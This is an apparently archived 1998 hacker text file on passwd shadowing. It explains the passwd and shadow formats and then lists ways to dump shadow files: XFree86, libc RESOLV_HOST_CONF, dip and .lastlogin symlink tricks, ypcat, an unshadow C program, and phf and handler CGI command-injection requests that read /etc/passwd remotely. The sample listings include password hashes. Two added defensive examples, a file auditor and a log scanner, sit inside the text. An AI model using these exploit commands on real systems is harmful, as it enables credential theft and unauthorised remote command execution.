Hacker's Arsenal - The Cutting Edge of Hacking.iso / texts / nix / shadow.txt (Text File, 2001-07-11, 6KB, 173 lines)
The Shadowed Passwd
by The Arctic League - http://arctik.com
In the old days hacking was easy. You got an account on a system, downloaded the passwd
file, and cracked the passwords. As you may have noticed, everyone eventually figured out that unshadowed
passwd files were not as secure as they thought. So someone at (find where) invented the idea of
shadowed passwds. On a system without shadowing, the file /etc/passwd looks like this:
root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-2:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
bhilton:LkjLiWy08xIWY:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:Kn0d4HJPfRSoM:502:100:Web Master:/home/web:/bin/bash
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
Quick little note about the normal passwd file:
mary:EauDLA/PT/HQg:503:100:Mary C. Hilton:/home/mary:/bin/bash
 1  :      2      : 3 : 4 :      5       :    6     :    7
1=username 2=encrypted password 3=user number (uid) 4=group id (gid) 5=real name
6=home directory 7=shell
On a system with passwd shadowing it would look like this:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
man:x:13:15:man:/usr/man:
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:x:-2:100:nobody:/dev/null:
ftp:x:404:1::/home/ftp:/bin/bash
guest:x:405:100:guest:/dev/null:/dev/null
bhilton:x:501:100:Bob Hilton:/home/bhilton:/bin/bash
web:x:502:100:Web Master:/home/web:/bin/bash
mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash
This type of passwd file is impossible to crack, for the simple reason that there is nothing to crack!
The real encrypted passwords are stored in different files on different systems, but the most common
location is /etc/shadow.
/etc/shadow will look something like this:
root:R0rmc6lxVwi5I:10441:0:99999:7:::
bin:*:10441:0:99999:7:::
daemon:*:10441:0:99999:7:::
adm:*:10441:0:99999:7:::
lp:*:10441:0:99999:7:::
sync:*:10441:0:99999:7:::
shutdown:*:10441:0:99999:7:::
halt:*:10441:0:99999:7:::
mail:*:10441:0:99999:7:::
news:*:10441:0:99999:7:::
uucp:*:10441:0:99999:7:::
operator:*:10441:0:99999:7:::
games:*:10441:0:99999:7:::
gopher:*:10441:0:99999:7:::
ftp:*:10441:0:99999:7:::
nobody:*:10441:0:99999:7:::
mary:EauDLA/PT/HQg:10441:0:99999:7:::
bhilton:LkjLiWy08xIWY:10446:-1:-1:-1:-1:-1:134529076
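As an added example (not part of the original text file), here is a small auditor for the two layouts listed above: the seven passwd fields the note explains, and the nine-field shadow layout (name, hash, last change, min, max, warn, inactive, expire, reserved), which is the standard shadow format rather than something the text spells out. It flags hashes left in the world-readable passwd file, accounts with an empty password field, and records that do not fit the expected field count; the sample records are constructed, mostly copied from the listings on this page.

```python
# Added example, not from the original text file: an auditor for the
# seven-field /etc/passwd and nine-field /etc/shadow layouts shown above.
# Sample records are constructed, mostly copied from the listings on this page.

PASSWD_FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
SHADOW_FIELDS = ("name", "passwd", "lastchg", "min", "max",
                 "warn", "inactive", "expire", "reserved")

def hash_state(field):
    """Classify a password field: shadowed, empty, locked or hash."""
    if field == "x":
        return "shadowed"   # the real hash lives in /etc/shadow
    if field == "":
        return "empty"      # the account logs in with no password at all
    if field == "*" or field.startswith("!"):
        return "locked"     # nothing can ever match this field
    return "hash"           # a crackable hash sits right here

def audit(lines, fields):
    """Return (name, issue) findings; with PASSWD_FIELDS, exposed hashes count too."""
    findings = []
    for line in lines:
        parts = line.rstrip("\n").split(":")
        if len(parts) != len(fields):
            findings.append((parts[0], "malformed: %d fields" % len(parts)))
            continue
        rec = dict(zip(fields, parts))
        state = hash_state(rec["passwd"])
        if state == "empty":
            findings.append((rec["name"], "empty password"))
        elif state == "hash" and fields == PASSWD_FIELDS:
            findings.append((rec["name"], "hash exposed in world-readable passwd"))
    return findings

PASSWD_SAMPLE = [
    "root:R0rmc6lxVwi5I:0:0:root:/root:/bin/bash",      # from the page
    "bin:*:1:1:bin:/bin:",                              # from the page
    "mary:x:503:100:Mary C. Hilton:/home/mary:/bin/bash",
    "guest::405:100:guest:/dev/null:/dev/null",         # constructed: empty field
]
SHADOW_SAMPLE = [
    "mary:EauDLA/PT/HQg:10441:0:99999:7:::",
    "gopher:*:10441:0:99999",                           # constructed: truncated
]

if __name__ == "__main__":
    for name, issue in audit(PASSWD_SAMPLE, PASSWD_FIELDS) + audit(SHADOW_SAMPLE, SHADOW_FIELDS):
        print("%s: %s" % (name, issue))
```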
There are many ways to unshadow a shadowed passwd file. I will go over a few of them here.
The first way to get the /etc/shadow file on a Linux system is to run the command:
XF86_SVGA -config /etc/shadow
Because of a bug in some versions of the configurator, it will echo /etc/shadow to your terminal.
This bug is in almost all Linux Slackware 3.3 systems and maybe anything that runs XFree86.
In most Linux versions there is a hole in libc 5.4.7 or earlier that lets you set your
resolv_host_conf to any file on the system. If you then run a SUID program that uses
resolv_host_conf, ping for example, it will cat the file to you.
One of these files will be suid:
ping, traceroute, rlogin, or ssh
1. Type bash to start a bash shell
2. Type: export RESOLV_HOST_CONF=/etc/shadow
3. Type one of the file names above with asdf, like this: ping asdf
It should cat the shadowed passwd file for you.
Note: you can replace /etc/shadow with any file you want to read.
On some Linux Slackwares you can use dip to get root; it can also be used to get the
shadow file.
ln -s /etc/shadow /tmp/dummy.dip
/sbin/dip -v /tmp/dummy.dip
If dip is vulnerable, this will type out the shadow file.
An old SCO and Sys V trick is the .lastlogin hack. Check that the .lastlogin file
in your home directory is owned by auth or root.
To exploit:
rm -f ~/.lastlogin
ln -s ~/.lastlogin /etc/passwd
Now logout and then back in so you create the link.
cat .lastlogin > passwd
rm -f ~/.lastlogin
Another old trick that still works once in a while is the ypcat hack. It works on some
SunOS, SCO, and System V systems. To use it, simply type ypcat /etc/passwd with your capture
option turned on.
The most widely known shadow hack is using repeated calls to the pw_* routines to get the file.
The unshadow C program works on some versions of Unix, mostly the same ones
that the ypcat trick works on.
-------unshadow.c cut here----------------
#include <stdio.h>
#include <pwd.h>

int main(void)
{
    struct passwd *p;

    /* On systems where getpwent() hands back the real hash, this rebuilds
       a classic unshadowed passwd line for every account. */
    while ((p = getpwent()) != NULL)
        printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
               (int)p->pw_uid, (int)p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
    endpwent();
    return 0;
}
---------End here------------------
Web & cgi exploits:
Any OS running a web server with /cgi-bin/phf executable is open to attack. The phf CGI calls
the program ph; if you send a CR character to it, it will let you execute commands on the system.
(This is a remote hack.)
http://www.target.com/cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd
or
http://www.target.com/cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd
Any OS (usually IRIX) running a web server with /cgi-bin/handler executable is hackable.
telnet target.machine.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0
Remember to use a TAB character after cat.
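From the defender's side, the two CGI request shapes described above (phf with an encoded newline or 0xff byte in the query, handler with a shell metacharacter in the path) are easy to spot in web server logs. This added example, not part of the original text file, scans constructed common-log-format lines for exactly those patterns; the client addresses and timestamps are made up, and the log regex assumes the usual "client ident user [time] "request" status" layout.

```python
# Added example, not from the original text file: flag the phf and handler
# request patterns described above in constructed common-log-format lines.
# Client addresses come from the documentation range; timestamps are made up.
import re
from urllib.parse import unquote_to_bytes

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3})')

def request_path(request):
    """Strip the method and protocol from a logged request line."""
    parts = request.split(" ")
    if len(parts) >= 3 and parts[-1].startswith("HTTP/"):
        return " ".join(parts[1:-1])    # keep spaces/tabs inside the path
    return " ".join(parts[1:])

def classify_request(path):
    """Name the pattern a request path matches, or return None."""
    if path.startswith("/cgi-bin/phf"):
        raw = unquote_to_bytes(path.partition("?")[2])   # decode %0A, %ff
        if b"\n" in raw or b"\xff" in raw:
            return "phf: newline/0xff byte in query"
    if path.startswith("/cgi-bin/handler"):
        if any(ch in path for ch in ";|\t"):
            return "handler: shell metacharacter in path"
    return None

def scan_log(lines):
    """Return (client, path, reason) for every line that matches a pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                    # not a common-log-format line
        path = request_path(m.group(3))
        reason = classify_request(path)
        if reason:
            hits.append((m.group(1), path, reason))
    return hits

SAMPLE_LOG = [   # constructed
    '203.0.113.5 - - [11/Jul/2001:10:00:00 +0000] "GET /cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd HTTP/1.0" 200 1024',
    '203.0.113.5 - - [11/Jul/2001:10:00:01 +0000] "GET /cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd HTTP/1.0" 200 1024',
    '203.0.113.5 - - [11/Jul/2001:10:00:02 +0000] "GET /cgi-bin/handler/x;cat\t/etc/passwd|?data=Download HTTP/1.0" 200 512',
    '198.51.100.7 - - [11/Jul/2001:10:00:03 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 300',
    '198.51.100.7 - - [11/Jul/2001:10:00:04 +0000] "GET /index.html HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for client, path, reason in scan_log(SAMPLE_LOG):
        print("%s %s <- %r" % (client, reason, path))
```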
(c)1998, The Arctic League - http://arctik.com